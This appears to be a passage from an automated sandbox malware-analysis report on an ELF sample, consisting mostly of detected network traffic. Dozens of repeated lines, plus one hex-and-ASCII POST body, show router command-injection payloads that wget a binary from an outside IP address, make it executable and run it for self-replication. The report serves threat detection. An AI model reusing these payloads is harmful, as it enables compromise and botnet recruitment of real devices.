            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: unknownDNS traffic detected: queries for: haha.skyljne.click
            Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 85Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Not Found</title></head><body><h1>404 Not Found</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 85Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Not Found</title></head><body><h1>404 Not Found</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Sun, 14 Jan 2024 15:19:57 GMTContent-Type: text/htmlX-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.
            Source: yonariVpu7.elfString found in binary or memory: http://103.245.236.152/skyljne.mips;$
            Source: yonariVpu7.elfString found in binary or memory: http://103.245.236.152/skyljne.mpsl;
            Source: yonariVpu7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: yonariVpu7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
            Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
